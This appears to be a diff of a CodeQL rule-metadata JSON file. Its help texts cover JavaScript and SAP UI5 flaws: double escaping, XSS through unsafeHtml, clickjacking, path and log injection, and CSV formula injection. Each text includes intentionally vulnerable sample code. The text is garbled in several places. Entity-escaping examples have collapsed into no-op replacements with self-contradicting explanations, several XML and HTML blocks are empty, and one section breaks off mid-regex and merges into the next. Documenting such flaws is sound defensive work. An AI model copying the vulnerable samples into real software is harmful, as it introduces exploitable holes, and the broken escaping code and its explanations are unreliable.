}, - "help" : { - "text" : "# Double escaping or unescaping\nEscaping meta-characters in untrusted input is an important technique for preventing injection attacks such as cross-site scripting. One particular example of this is HTML entity encoding, where HTML special characters are replaced by HTML character entities to prevent them from being interpreted as HTML markup. For example, the less-than character is encoded as `<` and the double-quote character as `"`. Other examples include backslash-escaping for including untrusted data in string literals and percent-encoding for URI components.\n\nThe reverse process of replacing escape sequences with the characters they represent is known as unescaping.\n\nNote that the escape characters themselves (such as ampersand in the case of HTML encoding) play a special role during escaping and unescaping: they are themselves escaped, but also form part of the escaped representations of other characters. Hence care must be taken to avoid double escaping and unescaping: when escaping, the escape character must be escaped first, when unescaping it has to be unescaped last.\n\nIf used in the context of sanitization, double unescaping may render the sanitization ineffective. Even if it is not used in a security-critical context, it may still result in confusing or garbled output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation. For URI encoding, you can use the standard `encodeURIComponent` and `decodeURIComponent` functions.\n\nOtherwise, make sure to always escape the escape character first, and unescape it last.\n\n\n## Example\nThe following example shows a pair of hand-written HTML encoding and decoding functions:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n return s.replace(/&/g, \"&\")\n .replace(/\"/g, \""\")\n .replace(/'/g, \"'\");\n};\n\nmodule.exports.decode = function(s) {\n return s.replace(/&/g, \"&\")\n .replace(/"/g, \"\\\"\")\n .replace(/'/g, \"'\");\n};\n\n```\nThe encoding function correctly handles ampersand before the other characters. For example, the string `me & \"you\"` is encoded as `me & "you"`, and the string `"` is encoded as `&quot;`.\n\nThe decoding function, however, incorrectly decodes `&` into `&` before handling the other characters. So while it correctly decodes the first example above, it decodes the second example (`&quot;`) to `\"` (a single double quote), which is not correct.\n\nInstead, the decoding function should decode the ampersand last:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n return s.replace(/&/g, \"&\")\n .replace(/\"/g, \""\")\n .replace(/'/g, \"'\");\n};\n\nmodule.exports.decode = function(s) {\n return s.replace(/"/g, \"\\\"\")\n .replace(/'/g, \"'\")\n .replace(/&/g, \"&\");\n};\n\n```\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [html-entities](https://www.npmjs.com/package/html-entities) package.\n* npm: [js-string-escape](https://www.npmjs.com/package/js-string-escape) package.\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", - "markdown" : "# Double escaping or unescaping\nEscaping meta-characters in untrusted input is an important technique for preventing injection attacks such as cross-site scripting. One particular example of this is HTML entity encoding, where HTML special characters are replaced by HTML character entities to prevent them from being interpreted as HTML markup. For example, the less-than character is encoded as `<` and the double-quote character as `"`. Other examples include backslash-escaping for including untrusted data in string literals and percent-encoding for URI components.\n\nThe reverse process of replacing escape sequences with the characters they represent is known as unescaping.\n\nNote that the escape characters themselves (such as ampersand in the case of HTML encoding) play a special role during escaping and unescaping: they are themselves escaped, but also form part of the escaped representations of other characters. Hence care must be taken to avoid double escaping and unescaping: when escaping, the escape character must be escaped first, when unescaping it has to be unescaped last.\n\nIf used in the context of sanitization, double unescaping may render the sanitization ineffective. Even if it is not used in a security-critical context, it may still result in confusing or garbled output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation. For URI encoding, you can use the standard `encodeURIComponent` and `decodeURIComponent` functions.\n\nOtherwise, make sure to always escape the escape character first, and unescape it last.\n\n\n## Example\nThe following example shows a pair of hand-written HTML encoding and decoding functions:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n return s.replace(/&/g, \"&\")\n .replace(/\"/g, \""\")\n .replace(/'/g, \"'\");\n};\n\nmodule.exports.decode = function(s) {\n return s.replace(/&/g, \"&\")\n .replace(/"/g, \"\\\"\")\n .replace(/'/g, \"'\");\n};\n\n```\nThe encoding function correctly handles ampersand before the other characters. For example, the string `me & \"you\"` is encoded as `me & "you"`, and the string `"` is encoded as `&quot;`.\n\nThe decoding function, however, incorrectly decodes `&` into `&` before handling the other characters. So while it correctly decodes the first example above, it decodes the second example (`&quot;`) to `\"` (a single double quote), which is not correct.\n\nInstead, the decoding function should decode the ampersand last:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n return s.replace(/&/g, \"&\")\n .replace(/\"/g, \""\")\n .replace(/'/g, \"'\");\n};\n\nmodule.exports.decode = function(s) {\n return s.replace(/"/g, \"\\\"\")\n .replace(/'/g, \"'\")\n .replace(/&/g, \"&\");\n};\n\n```\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [html-entities](https://www.npmjs.com/package/html-entities) package.\n* npm: [js-string-escape](https://www.npmjs.com/package/js-string-escape) package.\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-116", "external/cwe/cwe-020" ], - "description" : "When escaping special characters using a meta-character like backslash or\n ampersand, the meta-character has to be escaped first to avoid double-escaping,\n and conversely it has to be unescaped last to avoid double-unescaping.", - "id" : "js/double-escaping", - "kind" : "problem", - "name" : "Double escaping or unescaping", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/incomplete-multi-character-sanitization", - "name" : "js/incomplete-multi-character-sanitization", - "shortDescription" : { - "text" : "Incomplete multi-character sanitization" - }, - "fullDescription" : { - "text" : "A sanitizer that removes a sequence of characters may reintroduce the dangerous sequence." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Incomplete multi-character sanitization\nSanitizing untrusted input is a common technique for preventing injection attacks and other security vulnerabilities. Regular expressions are often used to perform this sanitization. However, when the regular expression matches multiple consecutive characters, replacing it just once can result in the unsafe text reappearing in the sanitized input.\n\nAttackers can exploit this issue by crafting inputs that, when sanitized with an ineffective regular expression, still contain malicious code or content. This can lead to code execution, data exposure, or other vulnerabilities.\n\n\n## Recommendation\nTo prevent this issue, it is highly recommended to use a well-tested sanitization library whenever possible. These libraries are more likely to handle corner cases and ensure effective sanitization.\n\nIf a library is not an option, you can consider alternative strategies to fix the issue. For example, applying the regular expression replacement repeatedly until no more replacements can be performed, or rewriting the regular expression to match single characters instead of the entire unsafe text.\n\n\n## Example\nConsider the following JavaScript code that aims to remove all HTML comment start and end tags:\n\n```javascript\n\nstr.replace(/\n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Writing user input directly to a UI5 View allows for\n a cross-site scripting vulnerability.", + "id" : "js/ui5-xss", + "kind" : "path-problem", + "name" : "UI5 Client-side cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/ui5-clickjacking", + "name" : "js/ui5-clickjacking", + "shortDescription" : { + "text" : "UI5 Clickjacking" + }, + "fullDescription" : { + "text" : "The absence of frame options allows for clickjacking." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n", + "markdown" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-451" ], + "description" : "The absence of frame options allows for clickjacking.", + "id" : "js/ui5-clickjacking", + "kind" : "problem", + "name" : "UI5 Clickjacking", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/ui5-path-injection", + "name" : "js/ui5-path-injection", + "shortDescription" : { + "text" : "UI5 Path Injection" + }, + "fullDescription" : { + "text" : "Constructing path from an uncontrolled remote source to be passed to a filesystem API allows for manipulation of the local filesystem." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n", + "markdown" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-035" ], + "description" : "Constructing path from an uncontrolled remote source to be passed\n to a filesystem API allows for manipulation of the local filesystem.", + "id" : "js/ui5-path-injection", + "kind" : "path-problem", + "name" : "UI5 Path Injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/ui5-log-injection", + "name" : "js/ui5-log-injection", + "shortDescription" : { + "text" : "UI5 Log injection" + }, + "fullDescription" : { + "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n", + "markdown" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-117" ], + "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", + "id" : "js/ui5-log-injection", + "kind" : "path-problem", + "name" : "UI5 Log injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/ui5-formula-injection", + "name" : "js/ui5-formula-injection", + "shortDescription" : { + "text" : "UI5 Formula Injection" + }, + "fullDescription" : { + "text" : "Saving data from an uncontrolled remote source using filesystem or local storage leads to disclosure of sensitive information or forgery of entry." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n", + "markdown" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by 